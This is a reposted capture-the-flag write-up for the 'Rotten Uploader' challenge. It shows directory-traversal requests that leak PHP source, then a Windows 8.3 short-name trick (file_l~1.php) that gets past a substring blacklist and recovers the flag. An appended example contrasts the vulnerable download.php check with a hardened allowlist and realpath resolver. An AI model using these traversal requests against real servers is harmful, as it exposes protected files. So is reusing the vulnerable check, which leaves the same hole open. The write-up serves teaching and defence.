Tokyo Westerns/MMA CTF - Rotten Uploader
Source: Internet. Editor: 程序博客网. Time: 2024/05/08 07:01
http://zubcic.re/blog/tokyo-westerns-mma-ctf-rotten-uploader
The download links had the following format: download.php?f=test.cpp
The script was vulnerable to directory traversal, which allowed us to fetch the source of the index page by requesting download.php?f=../index.php
This gave us the following source code:
<?php
/**
 *
 */
include('file_list.php');
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0 Level 2//EN">
<html>
  <head>
    <title>Uploader</title>
  </head>
  <body>
    <h1>Simple Uploader</h1>
    <p>There are no upload features.</p>
    <h3>Files</h3>
    <table width="100%" border="1">
      <tr>
        <th>#</th>
        <th>Filename</th>
        <th>Size</th>
        <th>Link</th>
      </tr>
      <?php foreach($files as $file): ?>
      <?php if($file[0]) continue; // visible flag ?>
      <tr>
        <td><?= $file[1]; ?></td>
        <td><?= $file[2]; ?></td>
        <td><?= $file[3]; ?> bytes</td>
        <td><a href="download.php?f=<?= $file[4]; ?>">Download</a></td>
      </tr>
      <?php endforeach; ?>
    </table>
  </body>
</html>
And download.php via download.php?f=../download.php:
<?php
header("Content-Type: application/octet-stream");
if(stripos($_GET['f'], 'file_list') !== FALSE) die();
readfile('uploads/' . $_GET['f']); // safe_dir is enabled.
?>
Clearly the goal is getting the contents of file_list.php, but the download script checks whether the requested filename contains 'file_list'. After some thinking, and realizing the server was running Windows, we decided to try converting the filename to its 8.3 short filename. We requested download.php?f=../file_l~1.php
and got file_list.php's source:
<?php
$files = [
  [FALSE, 1, 'test.cpp', 1135, 'test.cpp'],
  [FALSE, 2, 'test.c', 74, 'test.c'],
  [TRUE, 3, 'flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7', 35, 'flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7'],
  [FALSE, 4, 'test.rb', 1446, 'test.rb'],
];
Having the flag's filename, we downloaded it by requesting download.php?f=flag_c82e41f5bb7c8d4b947c9586444578ade88fe0d7
and received the flag: TWCTF{Hotto_Smile}
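The weak substring check from download.php beside a hardened resolver, as an added example that is not part of the original write-up or the challenge code; the $files layout follows file_list.php above, and the temporary directory, the allowlist contents and the function names are constructed for the demonstration:

```php
<?php
// Added example, not code from the challenge: the deployed blacklist next to
// a resolver that only serves names present in the file list and whose
// canonical path stays under the uploads directory.

// Weak check as deployed: a substring blacklist on the raw parameter.
// It does not stop ../ traversal, and on Windows the 8.3 short name
// file_l~1.php reaches file_list.php without ever containing 'file_list'.
function weak_is_allowed(string $f): bool {
    return stripos($f, 'file_list') === false;
}

// Hardened check. $files uses the page's layout: [hidden, id, name, size, path].
function resolve_upload(string $uploads_dir, array $files, string $f): ?string {
    // 1. Allowlist: the name must equal, byte for byte, the stored path of an
    //    entry that index.php would list, so aliases such as short names never match.
    $listed = false;
    foreach ($files as $entry) {
        if ($entry[0] === false && $entry[4] === $f) { $listed = true; break; }
    }
    if (!$listed || $f !== basename($f)) {
        return null;
    }
    // 2. Containment: resolve what the filesystem will actually open and
    //    require it to sit under the real uploads directory (trailing
    //    separator included, so "uploads2" is not mistaken for "uploads").
    $base = realpath($uploads_dir);
    $target = ($base === false) ? false : realpath($base . DIRECTORY_SEPARATOR . $f);
    if ($target === false || !is_file($target)
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

// Demonstration on a constructed temporary layout mirroring the challenge.
$root    = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rotten_' . bin2hex(random_bytes(4));
$uploads = $root . DIRECTORY_SEPARATOR . 'uploads';
mkdir($uploads, 0700, true);
file_put_contents($uploads . DIRECTORY_SEPARATOR . 'test.c', "int main(){}\n");
file_put_contents($root . DIRECTORY_SEPARATOR . 'file_list.php', "<?php\n");
$files = [[false, 2, 'test.c', 74, 'test.c']];

foreach (['test.c', '../file_list.php', '../file_l~1.php'] as $f) {
    printf("%-20s weak=%s hardened=%s\n", $f,
        weak_is_allowed($f) ? 'allow' : 'deny',
        resolve_upload($uploads, $files, $f) === null ? 'deny' : 'allow');
}
```

The allowlist comparison is what closes the short-name trick regardless of how the platform canonicalises names; the realpath containment check is a second, independent guard.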